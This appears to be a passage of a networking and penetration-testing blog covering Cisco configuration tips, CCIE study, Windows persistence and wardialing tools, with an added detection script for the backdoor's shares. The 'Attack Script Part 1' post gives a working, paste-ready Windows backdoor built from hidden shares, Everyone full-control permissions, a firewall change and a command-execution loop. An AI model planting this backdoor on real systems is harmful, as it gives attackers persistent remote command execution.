Wednesday, December 8, 2010

Lightning Tip Gnome Connection Manager

I typically find that most Cisco admins run Windows or Mac. I am partial to Linux; I love the stability, but I never found anything that could compete with SecureCRT on Windows or Mac. I recently found Gnome Connection Manager, which is very comparable to SecureCRT, plus it's free! Gnome Connection Manager supports telnet, SSH and tabs, and will automatically enter usernames and passwords. This is a very powerful addition for Cisco admins who run Linux. Check out Gnome Connection Manager and give Linux a try; I'm sure you will like it.

Monday, November 29, 2010

Lightning TIP Viewing Traffic as it Crosses a Router

Do you have a need to see the packets crossing your router? If you do, you can use the debug ip packet detail command to see this traffic. The problem is that it's typically so much traffic that it's not useful. This is where an access list can help: it restricts the debug to only the packets that match.

access-list 101 permit ip host host
access-list 101 permit ip host host

Now reuse the earlier debug with the access-list.

Router#debug ip packet detail 101

If you tweak your logging settings just right, you should be able to capture the packet detail to syslog or to the console in real time, giving you insight into the specific traffic you are looking for.

Back in Black

Hello everyone. I have returned! I will be writing more often about topics in tech that interest me. This blog won't have the specific focus on Information Security or Cisco that it has had in the past. It will be loosely based on technology, information security, hacking and whatever else I feel like writing about. If you are reading this, thanks for your support.

Tuesday, July 28, 2009

Auth Proxy without a Cisco ACS server on an ASA

Does your organization have Active Directory? Do you have a Cisco Router or ASA? You can do authorization proxy or cut-through proxy to your Active Directory without having an ACS server. How? I will show you.

You will need at least one Windows server and a Cisco ASA or router.
First we will go to the Windows server. This server must be part of your Active Directory and should preferably be running Windows Server 2003 or later.

Installing IAS server
  1. Log in as an Administrator
  2. Go to Start > Control Panel > Add or Remove Programs
  3. Click Add/Remove Windows Components
  4. Scroll through the list and Click Networking Services
  5. Click Details
  6. Check the box next to Internet Authentication Service
  7. Click OK
  8. Then Next and Finish
The system may ask you to insert your Windows Server 2003 CD, so have it handy. To verify that it is installed, go to Start > Administrative Tools > Internet Authentication Service.

Configuring IAS for AD

Now we want to configure our IAS server to allow RADIUS authentication of the Active Directory group we are going to create. To do this we need to complete the following steps.

  1. Go to Start > Administrative Tools > Internet Authentication Service
  2. Right-click on Internet Authentication Service in the top left of the window
  3. Choose Register Server In Active Directory
  4. Choose OK on the first message, which allows the server to read the dial-in permission of the users from AD
  5. Choose OK on the message that follows the first one.

Add your device to the IAS Server

We now want to add the router/ASA to the IAS server. To add it we do the following.
  1. Right-click on the RADIUS Clients folder
  2. Choose New RADIUS Client
  3. Enter the Friendly Name and the IP address or FQDN, then click Next
  4. Leave the default RADIUS Standard in Client-Vendor, enter the Shared Secret, confirm it and choose Finish
You should now see a device in the right pane of the window.

Edit your Remote Access Policy
We now want to add a Remote Access Policy that will give our group permission to authenticate to our devices.
  1. In the Internet Authentication Service window, click Remote Access Policies in the left pane.
  2. In the right pane, right-click the default policy, and select Delete.
  3. Right Click on Remote Access Policy
  4. Choose New Remote Access Policy
  5. Choose Next
  6. Click Set Up A Custom Policy, name it Cisco-Auth
  7. In the Policy Conditions Window Section add your Windows Group from Active Directory
  8. Choose Next
  9. Choose Grant Remote Access Permission
  10. Choose the Edit Profile Button
  11. Choose the Authentication tab, uncheck all options, then check Unencrypted Authentication
  12. Click the Advanced Tab
  13. Remove the Framed-Protocol Radius Standard PPP
  14. Choose Service-Type Radius Standard Framed entry click edit
  15. Change the Attribute Value to Login click Ok
  16. Click Add, click Vendor Specific, click Add, choose Cisco, then Yes It Conforms and Configure Attribute
  17. Add the string shell:priv-lvl=15, or change the number to whatever privilege level you want your users to have.
  18. Click ok and ok and ok and close.

AAA Radius Authentication setup
OK, that's enough Windows, so let's get going on our ASA with the following commands.
  1. ASA(config)#aaa-server RADIUS protocol radius
  2. ASA(config)#aaa-server RADIUS (inside) host IPofyourhost password
  3. ASA(config-aaa-server-host)#authentication-port 1812
  4. ASA(config-aaa-server-host)#accounting-port 1813
Then you want to test your AAA setup:
ASA#test aaa-server authentication RADIUS username yourusername password yourpassword

It will then ask you for a host IP. If everything is set up correctly you will get
INFO: Authentication Successful

Setup Cut Through Proxy

First we create an ACL to define what we want to be authenticated (web traffic on ports 80 and 443).

ASA(config)#access-list cut-through extended permit tcp any any eq 80

ASA(config)#access-list cut-through extended permit tcp any any eq 443

Then we configure the authentication:
ASA(config)#aaa authentication match cut-through inside RADIUS

So that's it! We just saved our company some money by not needing a Cisco ACS for auth-proxy/cut-through proxy. We still don't get the advanced features of the ACS, but we do get a free authentication server. If you want to do the same thing on a router, use something like this.

aaa new-model
! auth-proxy authenticates users against the default login list and authorizes them via the auth-proxy list
aaa authentication login default group radius
aaa authorization auth-proxy default group radius
radius-server host auth-port 1812 acct-port 1813 key
ip http server
! the auth-proxy login page is served by the HTTP server, which must hand authentication to AAA
ip http authentication aaa
ip auth-proxy name security http inactivity-time 60
interface f0/0
 ip auth-proxy security

You can use the RADIUS server we just created for login authentication as well, but make sure you are running a crypto IOS image and using SSH; otherwise you expose your Windows passwords in cleartext over telnet, which undermines the Windows domain's already encrypted infrastructure.

Thursday, July 23, 2009

CCIE Security July 23rd 2009

Alright, I am adopting the mantra "It doesn't matter how slow you go, it only matters if you stop." I have been banging on the CCIE Security since the beginning of the year, and I am starting to get to a point where I feel there isn't a ton of study material available. The material I have from IPexpert is first rate, but I am beginning to think I picked a really bad time to start studying for a CCIE in Security. I haven't been exposed to the lull in material after a blueprint change in any other type of certification I have pursued.

I have, on the other hand, done some of the new labs from IPexpert, and they are of much better quality than the previous ones. I have been working on LAB1A all this week and I think I learned quite a few things about the ASA, especially MPF. It's really cool that you can change HTTP headers for web servers using MPF. You can make your server header say anything you want, like the following (spoof-server lives under the parameters submode of the HTTP inspection policy map).

policy-map type inspect http MAP_HTTP
 parameters
  spoof-server "This Server runs on Caffeine!"

I know that if I keep going on my path to CCIE I will get there! I am sure in a few more months more study materials will appear, but it just seems like they are extremely sparse right now. I guess the number of CCIE Security holders is so low that it might be hard to get study material written. The R&S CCIE won't be like this, I am sure.

Friday, March 13, 2009

Attack Script Part 1

First off, let me say that I am going to start posting shorter blogs more frequently. I guess I have been kind of inspired by Twitter. Instead of one giant post every month I am going to try to post several smaller posts. I am also going to be using this blog as a sounding board for my upcoming CCIE Security lab studies. I am going to write down what I encounter and see if anything strikes any readers out there on the net.

We are going to create a back door that we can use over Windows file sharing. It will allow you to run any command and have its output exported into a file. This is an add-on to Ed Skoudis's for loop that allows this to happen.

So let's say we have popped a shell on a Windows box. OK, pentest is over, right? Wrong! We need to use this box as a pivot point to try to go deeper into the network. So what can we do to keep access to this system without introducing any new software onto it?

We start by creating a couple of folders. We want to create these folders in a somewhat inconspicuous location; I usually choose C:\windows\system. The commands to do this are:

mkdir C:\windows\system\input
mkdir C:\windows\system\output

Next we want to hide the two folders by making them hidden and system folders. That means anyone looking for them has to show both hidden files and protected operating system files in Explorer to see the folders. To do this we use the following commands.

attrib C:\windows\system\input +H +S
attrib C:\windows\system\output +H +S

Now we want to share the two folders. To do this we use the net share command, but we name the shares with a dollar sign at the end so they don't show up in network browse lists.

net share input$=c:\windows\system\input
net share output$=c:\windows\system\output

Now the next step is up to you and your rules of engagement. What we want to do is control access to these shares. The easiest way is to give the folders the Everyone permission, but this might introduce new vulnerabilities into the system. It might be prudent to create a new user on the system and then give that user permission to these folders. It's up to you, but for the sake of the example we will use the Everyone permission.

echo Y| cacls c:\windows\system\input /P everyone:F
echo Y| cacls c:\windows\system\output /P everyone:F

Next we turn on simple file sharing in the Windows firewall to make Windows share these folders the way we want it to. We do this with some netsh fu.

netsh firewall set service type = FILEANDPRINT mode = ENABLE

We now want to dump a command into our commands.txt file. This is the file we echo into to run commands through the backdoor. We dump a sample command into it first to make sure our loop is successful. The command is:

echo ipconfig /all > c:\windows\system\input\commands.txt

Now we finally set our loop in motion. This loop takes the commands from commands.txt, runs them, and then dumps the output to output.txt. The loop looks like the following.

for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output\output.txt & del c:\windows\system\input\commands.txt) & ping -n 2

I know this looks like someone threw up on your command line. It works though!! What it does is look for the commands.txt file. It then reads the file, runs the command in the file and deletes the file. It then dumps the output to the output.txt file. It does this every two seconds. So what we have is the following script, which can be pasted into a shell.

rem make them
mkdir c:\windows\system\input
mkdir c:\windows\system\output
rem hide them
attrib c:\windows\system\input +H +S
attrib c:\windows\system\output +H +S
rem share them
net share input$=c:\windows\system\input
net share output$=c:\windows\system\output
rem allow everyone into them
echo Y| cacls c:\windows\system\input /P everyone:F
echo Y| cacls c:\windows\system\output /P everyone:F
rem enable simple filesharing
netsh firewall set service type = FILEANDPRINT mode = ENABLE
rem dump a sample command into commands.txt
echo ipconfig /all > c:\windows\system\input\commands.txt
rem Use Ed Skoudis's for /L loop
for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output\output.txt & del c:\windows\system\input\commands.txt) & ping -n 2

So you can now copy the above text and paste it into your shell. If you want to make this a batch file, make sure that you change all of the % symbols in the loop to %%; then it will work as a batch file.

To make sure it's working after you start the loop use the following command.

type \\(ip-address)\output$\output.txt

You should see the output of ipconfig /all on the screen.

To run a new command we use the following:

echo (command) > \\(ip-address)\input$\commands.txt

OK, so that's it: a quick, simple and dirty Windows command line backdoor.
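A defender-side check for the pattern above, as an added example that is not part of the original post: it parses `net share` and `cacls` output (constructed sample text embedded below, so it runs offline) and flags hidden shares that are not Windows' own administrative shares, point into the Windows directory, or grant Everyone full control.

```python
import re

# Windows' own hidden administrative shares; any other name ending in "$" deserves a look.
DEFAULT_HIDDEN_SHARES = {"ADMIN$", "IPC$", "PRINT$"} | {f"{c}$" for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}
SYSTEM_DIRS = ("C:\\WINDOWS", "C:\\WINNT")

def parse_net_share(text):
    """Parse `net share` output into {share_name: local_path}; rows without a path (IPC$) are skipped."""
    shares = {}
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+([A-Za-z]:\\\S*)", line)
        if m:
            shares[m.group(1)] = m.group(2)
    return shares

def everyone_full_control(cacls_text):
    """True if a `cacls <path>` listing grants Everyone full control, with or without (OI)(CI) flags."""
    return re.search(r"Everyone:(?:\([A-Z]+\))*F\b", cacls_text) is not None

def find_suspicious_shares(net_share_text, cacls_listings):
    """Return {share: [reasons]}; cacls_listings maps each local path (as printed by net share) to its cacls output."""
    findings = {}
    for name, path in parse_net_share(net_share_text).items():
        if not name.endswith("$") or name.upper() in DEFAULT_HIDDEN_SHARES:
            continue  # visible shares and the built-in admin shares are out of scope for this check
        reasons = ["non-default hidden share"]
        if path.upper().startswith(SYSTEM_DIRS):
            reasons.append("share points into the Windows directory")
        if everyone_full_control(cacls_listings.get(path, "")):
            reasons.append("Everyone has full control")
        findings[name] = reasons
    return findings

# Constructed sample output (not captured from a real host), shaped like `net share` and `cacls`.
SAMPLE_NET_SHARE = """\
Share name   Resource                        Remark
-------------------------------------------------------------------------------
ADMIN$       C:\\WINDOWS                      Remote Admin
C$           C:\\                             Default share
IPC$                                         Remote IPC
Public       C:\\Users\\Public
input$       c:\\windows\\system\\input
output$      c:\\windows\\system\\output
The command completed successfully.
"""
SAMPLE_CACLS = {
    "c:\\windows\\system\\input": "c:\\windows\\system\\input Everyone:(OI)(CI)F\n",
    "c:\\windows\\system\\output": "c:\\windows\\system\\output Everyone:(OI)(CI)F\n",
    "C:\\WINDOWS": "C:\\WINDOWS BUILTIN\\Administrators:(OI)(CI)F\n",
}

if __name__ == "__main__":
    for share, reasons in find_suspicious_shares(SAMPLE_NET_SHARE, SAMPLE_CACLS).items():
        print(f"{share}: {'; '.join(reasons)}")
```

On a real host, feed it the captured text of `net share` and of `cacls` run against each shared path; a hit on all three reasons is exactly the input$/output$ layout this post builds.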

In the next post I will write a script that uses WMI to copy over any payload you want and then run it. You can use the runas command to run the script as a user that you have already compromised. You can then turn the above script into a batch file and run it without having to pop a shell on the machine.

Saturday, March 7, 2009

The Return of Wardialing

Wardialing is kind of a lost art in the hacking community. Some of us used THC-SCAN or ToneLoc back in the day to dial out as many prefixes as possible trying to find a low security backdoor into systems. With the inception of VOIP this skillset has come back into play and is a really valid skill for penetration testers. You would be shocked at how many organizations still use dial in for systems administration. I have seen routers with modems directly connected to console cables and tons of embedded devices with modems still hanging off of them. In this post I will show you how to Wardial with two different tools.

The first tool was a paid commercial tool but is now free. This tool is SecureLogix TeleSweep. It requires SOUL SUCKING REGISTRATION, but it's a good free Windows wardialer. If you don't want to register, our second tool is open source, so just read on.

First you need to download SecureLogix Telesweep. You can register and download the tool here

Once you have downloaded the application you can unzip and install it. It installs just like any other Windows application and shouldn't be a problem for anyone familiar with Windows. The next step is to execute the dialer configuration tool. TeleSweep is a distributed application, so it allows you to have several dialers report back to one manager. Walk through the wizard, set up your modem and enter the license that was sent in the email from SecureLogix. Make sure your modem is recognized by scanning for it.

The next step is to open the TeleSweep secure management server and license it. It will then open a profile and show you the computers that are attached to the management server. This allows you to connect several machines and run them all against a prefix.

Once it is open you can double-click on the sample profile. This will show you some of the power of this tool. You can dial numbers, and you can also give it a list of usernames and passwords to try against a target once it has detected a carrier. So this tool will dial, try to automatically penetrate, and then give a report of what it has done.

All in all this is a great tool for stand-alone wardialing, but in combination with the next tool we are going to discuss it becomes even better for targeted testing because of its penetration ability.

The next tool we are going to talk about is a new one from the venerable H D Moore. Anyone who doesn't know who H D is probably shouldn't be reading this blog. H D is a personal hero of mine and has built the absolute best open source exploitation tool, Metasploit. His new tool is called WarVox. WarVox allows you to leverage VOIP providers to execute your wardialing and then records its results in sound files. It's a new spin on wardialing, and it gives you great speed.

So let's install WarVox. You need Linux for WarVox; I will be doing the install on BackTrack 4, but you can also use Ubuntu. I will be using the svn version; if you prefer to use a stable tar file, they are available for download.

  1. Open a command line in your Linux Distribution and type in

    sudo apt-get install build-essential libiaxclient-dev sox lame ruby rake rubygems libsqlite3-ruby gnuplot

    This will take care of all of the dependencies needed for WarVox.

  2. Next we want to install mongrel to improve the speed of WarVox. Use the following command to do this

    gem install mongrel

  3. Next we want to download warvox so we use:

    svn co

  4. We probably want to rename the directory to something more descriptive after downloading it. I renamed it to WarVox using the following:

    mv trunk WarVox

  5. Next we enter into the WarVox directory and type make

  6. If everything makes correctly you will be greeted with the following text:

  7. Finally we start WarVox with the following:


  8. Then we browse to if everything worked out we will be greeted by a username and password. The default username is admin and the password is warvox. You can change these by editing the warvox.conf file. Then we get a nice web interface:

After installing the program you can set it up with a service provider and begin wardialing. The beauty of this program is its speed and its ability to fingerprint a line as fax, voice, etc. If you use the two programs I have shown in combination, you will get very good wardialing results in a very short period of time: use WarVox first, then put the results into TeleSweep to drill further down into your targets. Both of these tools together can give a very productive wardialing experience. In a world of VOIP, wardialing should be a part of every VOIP penetration test.